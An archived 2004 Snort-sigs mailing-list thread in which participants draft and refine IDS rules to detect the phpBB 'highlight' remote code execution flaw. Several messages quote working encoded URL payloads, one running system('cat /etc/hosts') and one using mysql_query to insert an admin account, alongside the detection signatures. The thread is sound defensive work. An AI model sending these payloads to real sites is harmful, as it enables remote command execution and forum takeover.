Hello, this rule is intended to detect the recently discovered remote
code execution bug, it is similar to rule 2001457, but there is some
attacks I tested that that rule does not detect and this one does (p.e.
viewtopic.php?t=2& highlight=%2527%252esystem(chr(99)%252ec
hr(97)%252echr(116
 )%252echr(32)%252echr(47)%252echr(101)%2
52echr(116)%252echr(99)%252echr(47)%
 252echr(104)%252echr(111)%252echr(115)%2
52echr(116)%252echr(115))%252e%2527)
)

Rule:

drop tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"phpBB <=
2.0.10 Remote code execution"; content:"/viewtopic.php?"; content:"t=";
content:"highlight="; content:"system";
reference:url,secunia.com/advisories/13239;
classtype:web-application-attack; sid:100100; rev:1;)

Reference:
http://secunia.com/advisories/13239

Thanks...
--
Federico Petronio
petrus@activesec.biz








-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]

Federico,

You might want to have an additional rule that uses uricontent instead
of content, to deal with obfuscated GET requests such as:

http://<victim>/%76%69%65%77%74%6F%70%69%63.php?%74=2&%68%69%67%68%6C%69%67%
68%74=...

Also, consider using distance:0 as a modifier to your content:"system"
match if, as seems to be implied here, system will always be part of the
value of the highlight parameter. This will force Snort to find "system"
after "highlight=", adding a nice validity check to your detection.

Alex Kirk
Research Analyst
Sourcefire, Inc.

> Hello, this rule is intended to detect the recently discovered remote
> code execution bug, it is similar to rule 2001457, but there is some
> attacks I tested that that rule does not detect and this one does
> (p.e.
> viewtopic.php?t=2& highlight=%2527%252esystem(chr(99)%252ec
hr(97)%252echr(1
 16)%252echr(32)%252echr(47)%252echr(101)
%252echr(116)%252echr(99)%252echr(47
 )%252echr(104)%252echr(111)%252echr(115)
%252echr(116)%252echr(115))%252e%252
7))
>
>
> Rule:
>
> drop tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"phpBB <=
> 2.0.10 Remote code execution"; content:"/viewtopic.php?"; content:"t=";
> content:"highlight="; content:"system";
> reference:url,secunia.com/advisories/13239;
> classtype:web-application-attack; sid:100100; rev:1;)
>
> Reference:
>     http://secunia.com/advisories/13239
>
> Thanks...




-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]

<div>This rule will only catch system command execution attempts and not
sql injection.  </div><br /><div>The following is an example of sql
injection:</div><br /><div><font face="Times New Roman" size="3"><a
href="http://victim.com/phpbb2/viewtopic.php?t=1&highlight=%2527%252emysql_q
 uery(chr(73)%252echr(78)%252echr(83)%252
echr(69)%252echr(82)%252echr(84)%252
 echr(32)%252echr(73)%252echr(78)%252echr
(84)%252echr(79)%252echr(32)%252echr
(112)%252echr(104)%252echr(
 112)%252echr(98)%252echr(98)%252echr(50)
%252echr(95)%252echr(117)%252echr(11
 5)%252echr(101)%252echr(114)%252echr(115
)%252echr(40)%252echr(117)%252echr(1
 15)%252echr(101)%252echr(114)%252echr(95
)%252echr(105)%252echr(100)%252echr(
44)%252echr(117)%252echr(11
 5)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116
 )%252echr(105)%252echr(118)%252echr(101)
%252echr(44)%252echr(117)%252echr(11
 5)%252echr(101)%252echr(114)%252echr(110
)%252echr(97)%252echr(109)%252echr(1
01)%252echr(44)%252echr(117
 )%252echr(115)%252echr(101)%252echr(114)
%252echr(95)%252echr(112)%252echr(97
 )%252echr(115)%252echr(115)%252echr(119)
%252echr(111)%252echr(114)%252echr(1
 00)%252echr(44)%252echr(117)%252echr(115
)%252echr(101)%252echr(114)%252ec
 hr(95)%252echr(108)%252echr(101)%252echr
(118)%252echr(101)%252echr(108)%252e
 chr(41)%252echr(32)%252echr(86)%252echr(
65)%252echr(76)%252echr(85)%252echr(
 69)%252echr(83)%252echr(32)%252echr(40)%
252echr(39)%252echr(57)%252echr(57)%
252echr(57)%252echr(57)%25
 2echr(57)%252echr(39)%252echr(44)%252ech
r(39)%252echr(49)%252echr(39)%252ech
 r(44)%252echr(39)%252echr(122)%252echr(1
01)%252echr(51)%252echr(108)%252echr
 (111)%252echr(99)%252echr(107)%252echr(3
9)%252echr(44)%252echr(39)%252echr(9
8)%252echr(97)%252echr(51)%
 252echr(99)%252echr(56)%252echr(51)%252e
chr(51)%252echr(52)%252echr(56)%252e
 chr(98)%252echr(100)%252echr(100)%252ech
r(102)%252echr(55)%252echr(98)%252ec
 hr(51)%252echr(54)%252echr(56)%252echr(9
8)%252echr(52)%252echr(55)%252echr(5
6)%252echr(97)%252echr(99)%
 252echr(48)%252echr(54)%252echr(100)%252
 echr(51)%252echr(51)%252echr(52)%252echr
(48)%25
 2echr(101)%252echr(39)%252echr(44)%252ec
 hr(39)%252echr(49)%252echr(39)%252echr(4
1))%252
e%2527">http://victim.com/phpbb2/viewtopic.php?t=1&
amp;highlight=%2527%252e<strong>mysql_query</strong>(chr(73)%252echr(78)%252
 echr(83)%252echr(69)%252echr(82)%252echr
(84)%252echr(32)%252echr(73)%252echr
 (78)%252echr(84)%252echr(79)%252echr(32)
%252echr(112)%252echr(104)%252echr(1
12)%252echr(98)%252echr(98
 )%252echr(50)%252echr(95)%252echr(117)%2
52echr(115)%252echr(101)%252echr(114
 )%252echr(115)%252echr(40)%252echr(117)%
252echr(115)%252echr(101)%252echr(11
 4)%252echr(95)%252echr(105)%252echr(100)
%252echr(44)%252echr(117)%252echr(11
5)%252echr(101)%252echr(114
 )%252echr(95)%252echr(97)%252echr(99)%25
2echr(116)%252echr(105)%252echr(118)
 %252echr(101)%252echr(44)%252echr(117)%2
52echr(115)%252echr(101)%252echr(114
 )%252echr(110)%252echr(97)%252echr(109)%
252echr(101)%252echr(44)%252echr(117
)%252echr(115)%252echr(101)
 %252echr(114)%252echr(95)%252echr(112)%2
52echr(97)%252echr(115)%252echr(115)
 %252echr(119)%252echr(111)%252echr(114)%
252echr(100)%252echr(44)%252echr(117
 )%252echr(115)%252echr(101)%252echr(114)
%252echr(95)%252echr(108)%252echr
 (101)%252echr(118)%252echr(101)%252echr(
108)%252echr(41)%252echr(32)%252echr
 (86)%252echr(65)%252echr(76)%252echr(85)
%252echr(69)%252echr(83)%252echr(32)
 %252echr(40)%252echr(39)%252echr(57)%252
echr(57)%252echr(57)%252echr(57)%252
echr(57)%252echr(39)%252ec
 hr(44)%252echr(39)%252echr(49)%252echr(3
9)%252echr(44)%252echr(39)%252echr(1
 22)%252echr(101)%252echr(51)%252echr(108
)%252echr(111)%252echr(99)%252echr(1
 07)%252echr(39)%252echr(44)%252echr(39)%
252echr(98)%252echr(97)%252echr(51)%
252echr(99)%252echr(56)%252
 echr(51)%252echr(51)%252echr(52)%252echr
(56)%252echr(98)%252echr(100)%252ech
 r(100)%252echr(102)%252echr(55)%252echr(
98)%252echr(51)%252echr(54)%252echr(
 56)%252echr(98)%252echr(52)%252echr(55)%
252echr(56)%252echr(97)%252echr(99)%
252echr(48)%252echr(54)%252
 echr(100)%252echr(51)%252echr(51)%252ech
r(52)%252echr(48)%252echr(101)%252ec
 hr(39)%252echr(44)%252echr(39)%252echr(4
9)%252echr(39)%252echr(41))%252e%252
7</a>
</font><br /><br /></div><p style="MARGIN: 0px">Harry Chemin, CISSP<br
/>Senior IT Security Analyst<br />Go Daddy Software<br />14455 North
Hayden Road, Suite 226, Scottsdale, AZ 85260<br />480-505-8800 ext.
4194<br /><br /></p><br /><br /><blockquote style="PADDING-LEFT: 8px;
MARGIN-LEFT: 8px; BORDER-LEFT: blue 2px solid"><br />-------- Original
Message --------<br />Subject: Re: [Snort-sigs] phpBB remote code
execution detection rule<br />(final)<br />From: "Alex Kirk"
&lt;alex.kirk@sourcefire.com&gt;<br />Date: Wed, December 01, 2004 7:57
am<br />To: "Federico Petronio"
&lt;petrus@activesec.biz&gt;<br />Cc: bleeding@bleedingsnort.com,
"Snort Signatures List"<br
/>&lt;snort-sigs@lists.sourceforge.net&gt;<br /><br />Federico,<br
/><br />You might want to have an additional rule that uses uricontent
instead <br />of content, to deal with obfuscated GET requests such
as:<br /><br
/>http://&lt;victim&gt;/%76%6...69%67%68%74=...<br
/><br />Also, consider using distance:0 as a modifier to your
content:"system" <br />match if, as seems to be implied here,
system will always be part of the <br />value of the highlight
parameter. This will force Snort to find "system" <br />after
"highlight=", adding a nice validity check to your
detection.<br /><br />Alex Kirk<br />Research Analyst<br />Sourcefire,
Inc.<br /><br />&gt; Hello, this rule is intended to detect the
recently discovered remote<br />&gt; code execution bug, it is similar
to rule 2001457, but there is some <br />&gt; attacks I tested that
that rule does not detect and this one does <br />&gt; (p.e. <br />&gt;
viewtopic.php?t=2& amp;highlight=%2527%252esystem(chr(99)%2
52echr(97)%252echr
 (116)%252echr(32)%252echr(47)%252echr(10
1)%252echr(116)%252echr(99)%252echr(
 47)%252echr(104)%252echr(111)%252echr(11
5)%252echr(116)%252echr(115))%252e%2
527))
<br />&gt;<br />&gt;<br />&gt; Rule:<br />&gt;<br />&gt; drop tcp
$EXTERNAL_NET any -&gt; $HTTP_SERVERS $HTTP_PORTS (msg:"phpBB
&lt;=<br />&gt; 2.0.10 Remote code execution";
content:"/viewtopic.php?"; content:"t=";<br />&gt;
content:"highlight="; content:"system";<br />&gt;
reference:url,secunia.com/advisories/13239;<br />&gt;
classtype:web-application-attack; sid:100100; rev:1;)<br />&gt;<br
/>&gt; Reference:<br />&gt;     http://secunia.com/advisories/13239<br
/>&gt;<br />&gt; Thanks...<br /><br /><br /><br /><br
/>-------------------------------------------------------<br />SF email
is sponsored by - The IT Product Guide<br />Read honest & candid
reviews on hundreds of IT Products from real users.<br />Discover which
products truly live up to the hype. Start reading now. <br
/>http://productguide.itmanagersjournal.com/<br
/> ________________________________________
_______<br />Snort-sigs
mailing list<br />Snort-sigs@lists.sourceforge.net<br
/>https://lists.sourceforge.net/lists/listinfo/snort-sigs </blockquote>



-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]

This link describes an attack that adds an admin user to any vulnerable
phpBB forum using some of the content you described.
http://www.securiteam.com/unixfocus/6Z00R2ABPY.html

The 2001457 rule is just hunting the /'.system(/ so no matter what command
is attempted it should trigger. I tested by sending an ls command to a
forum:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
phpBB Highlighting Remote Code Execution Attempt HowDark.com";
flow:to_server,established; uricontent:"/viewtopic.php?t="; nocase;
uricontent:"&highlight='.system("; nocase;
reference:url,www.howdark.com/poc/phpbb2010_hl.phps; sid:2001457; rev:4;)


Shirkdog
http://www.shirkdog.us

 ________________________________________
_________________________
Is your PC infected? Get a FREE online computer virus scan from McAfee®
Security. http://clinic.mcafee.com/clinic/ibu...gn.asp?cid=3963



-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]

This is a multi-part message in MIME format.

------=_NextPart_000_6333_1cfa_307b
Content-Type: text/plain; format=flowed

>From: hchemin@godaddy.com
>To: "M. Shirk" <shirkdog_list@hotmail.com>
>Subject: RE: [Snort-sigs] phpBB remote code execution detection rule
>(final)
>Date: Wed,  1 Dec 2004 11:10:50 -0700
>
>viewtopic.php?t=#&highlight=%2527%252emysql_query
>I was able to replicate and exploit a test site running 2.08 version of
>phpbb

Ok, we just need to change the uricontent to look for the php function
mysql_query:

Try this:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
phpBB Highlighting SQL Injection <2.0.11";
flow:to_server,established; uricontent:"/viewtopic.php?t="; nocase;
uricontent:"&highlight='.mysql_query("; nocase;
reference:url,www.securiteam.com/unixfocus/6Z00R2ABPY.html; sid:2001999;
rev:1;)

Shirkdog
http://www.shirkdog.us

 ________________________________________
_________________________
FREE pop-up blocking with the new MSN Toolbar – get it now!
http://toolbar.msn.click-url.com/go...5ave/direct/01/

------=_NextPart_000_6333_1cfa_307b
Content-Type: text/plain; format=flowed


------=_NextPart_000_6333_1cfa_307b--


-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]

i got it. i see now, i went back to their site and they were able to make it
work, modified the first statement they made and released a fix for it.

guess i should pay more attention ;)
----- Original Message -----
From: "M. Shirk" <shirkdog_list@hotmail.com>
To: <snort-sigs@lists.sourceforge.net>
Sent: Wednesday, December 01, 2004 12:58 PM
Subject: RE: [Snort-sigs] phpBB remote code execution detection rule (fi
nal)


> This link describes an attack that adds an admin user to any vulnerable
> phpBB forum using some of the content you described.
> http://www.securiteam.com/unixfocus/6Z00R2ABPY.html
>
> The 2001457 rule is just hunting the /'.system(/ so no matter what command
> is attempted it should trigger. I tested by sending an ls command to a
> forum:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
> phpBB Highlighting Remote Code Execution Attempt HowDark.com";
> flow:to_server,established; uricontent:"/viewtopic.php?t="; nocase;
> uricontent:"&highlight='.system("; nocase;
> reference:url,www.howdark.com/poc/phpbb2010_hl.phps; sid:2001457; rev:4;)
>
>
> Shirkdog
> http://www.shirkdog.us
>
>  ________________________________________
_________________________
> Is your PC infected? Get a FREE online computer virus scan from McAfee®
> Security. http://clinic.mcafee.com/clinic/ibu...gn.asp?cid=3963
>
>
>
> -------------------------------------------------------
> SF email is sponsored by - The IT Product Guide
> Read honest & candid reviews on hundreds of IT Products from real users.
> Discover which products truly live up to the hype. Start reading now.
> http://productguide.itmanagersjournal.com/
>  ________________________________________
_______
> Snort-sigs mailing list
> Snort-sigs@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>
>
>
> --
> Incoming mail is certified Virus Free.
> Checked by AVG Anti-Virus (http://www.grisoft.com).
> Version: 7.0.279 / Virus Database: 265.4.4 - Release Date: 11/30/2004
>
>



-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

[ Post a follow-up to this message ]